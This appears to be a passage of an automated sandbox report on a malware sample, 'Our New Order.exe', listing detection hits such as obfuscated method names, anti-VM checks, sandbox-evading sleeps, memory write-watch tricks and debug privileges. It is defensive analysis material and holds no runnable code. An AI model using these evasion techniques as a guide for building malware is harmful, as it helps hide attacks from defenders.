Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, Rrtg704VPrQFTPknDI.cs High entropy of concatenated method names: 'Bey1c9nuu', 'FmdQyy0sR', 'FrIghQbLJ', 'jfVbuLHqE', 'bNRcl7jZX', 'UrurFvfMM', 'MaW2fCiuykk8IHlcbp', 'e6pPeJ84XuJDCTqXZF', 'dMINsrhN4', 'bmffbHGYY'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, fp4cloZClZ5u1hgnPM.cs High entropy of concatenated method names: 'sFE3KCMKRS', 'onL3Rb8qyI', 'ULmNMETqfr', 'bVTNJDfdCB', 'Go33umtL3N', 'Jql3Bkn2K9', 'apA32ZIAid', 'pBd3qkKYwk', 'G233sWSnZr', 'd903FnLrvO'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, Jl8JbicO3waUgpoWP6.cs High entropy of concatenated method names: 'helwQdGyiN', 'PkLwgA3Aun', 'OaAwnqjs3U', 'OsYwcgbsnR', 'PhEwYEZ3wx', 'JrlwtVAMi5', 'tnVw31eDG5', 'Q8mwNwLVZY', 'OEWwGO050D', 'NBMwfh8Lc3'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, siT5obwmXiGnhx6kX0.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xJH4e8cOtg', 'TZH4RbTFad', 'QSp4zOEkJE', 'rE3vMQBaLF', 'y0cvJObS69', 'UOgv4sd4Xv', 'xdtvvwl8ho', 'RiAYhDqq5cUhvrTnqdi'
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Our New Order.exe PID: 6260, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Our New Order.exe Memory allocated: 3180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Memory allocated: 3440000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Memory allocated: 3180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Memory allocated: 93E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Memory allocated: A3E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Memory allocated: A5E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Memory allocated: B5E0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Our New Order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599516 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599177 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599047 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598892 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598712 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598555 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598342 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598198 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598093 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595718 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595540 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595176 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595047 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594932 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594827 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594609 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594500 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594391 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594266 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594141 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594016 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593797 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593688 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2343 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7463 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Our New Order.exe TID: 6428 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599516 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599177 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599047 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598892 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598712 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598555 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598342 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598198 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598093 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595718 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595540 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595176 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595047 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594932 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594827 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594609 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594500 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594391 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594266 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594141 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594016 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593797 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593688 Jump to behavior
Source: Our New Order.exe, 00000000.00000002.965365648.00000000079B0000.00000004.08000000.00040000.00000000.sdmp, Our New Order.exe, 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vn5TmjQ6FoBSmNhgfS
Source: Our New Order.exe, 00000000.00000002.965365648.00000000079B0000.00000004.08000000.00040000.00000000.sdmp, Our New Order.exe, 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vn5TmjQ6FoBSmNhgfSxe8x6mvodrX4in9ogrJ8uuvFVryeTvQygL6CcsGjIRDr66m5IUqVFB
Source: RegSvcs.exe, 00000003.00000002.3374675013.0000000000E96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Our New Order.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05147B70 LdrInitializeThunk, 3_2_05147B70
Enables debug privileges
